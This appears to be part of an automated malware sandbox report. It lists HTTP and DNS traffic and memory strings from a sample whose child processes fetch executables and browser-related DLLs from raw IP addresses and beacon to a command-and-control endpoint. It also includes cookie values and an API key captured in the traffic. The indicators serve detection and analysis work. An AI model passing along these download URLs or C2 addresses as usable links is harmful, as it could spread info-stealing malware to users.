Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGPm2u7EGIjCw4PtzX5gzzDlwzXIWtDXrCiRfdbHDSucDXyTngU0wLJluDFuO6KRqHMbqhlFxbvMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-28-23; NID=513=Ram1jU97G6ZBnKUUJ8oMI4-XjULBzDD790zVj43iBZNk1Yp2YaPNHXrGAvGLRspoPDvdJcvektgjxpEjjxVGkUCXSctFEbyvv0N67MwU4FeBdKvf4ddYZiZKgFUux1935pXwz6RcpiBPOemLrBLXECHbF945fOhdYcRCbOGHnuw
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGPm2u7EGIjA9dOSf1SDRwKrHbolvoP0rB9qzZ3OV654e3Nqcz9gZgYsWMechJLShD5a3n0HBadgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-28-23; NID=513=U1mNAjRYwf8kotXLaHRXjIKbCBpEhQgUsQnSx5kNtaoiWyyfmjbtTM2oYBZgyEvsoJPYIXbLzSJiFX-UcmWyliVD-zR1RlK95xi5BrjDst_SB4sfe96osAXmTUm1HiywIJFIsfh-7xRoEKc9pv9KCzM5YzglK92qpic1G_e4DOM
Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=two HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 91.215.85.66:9000Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: note.padd.cn.com
Source: global traffic	DNS traffic detected: DNS query: svc.iolo.com
Source: global traffic	DNS traffic detected: DNS query: download.iolo.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com

Source: unknown

Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dllx
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dllB
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dllj
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001AB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2528909810.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php/
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php2
Source: u2ts.0.exe, 00000002.00000002.2528909810.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php2496b2f8604de64a7a02afb624c0-release
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php3
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php=
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpD
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpD%D
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpF
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpQrR
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpW%Microsoft
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpY
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpZ
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpb
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpe
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpl.
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpl.ID
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpmD
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpn
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpqD
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpr
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpu
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpv
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.phpy
Source: u2ts.0.exe, 00000002.00000002.2619977888.00000000281B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/c698e1bc8a2f5e6d.php~
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.150/ons
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002C36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002C36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4FP
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3240515596.0000000002C36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.215.85.66:9000t-
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
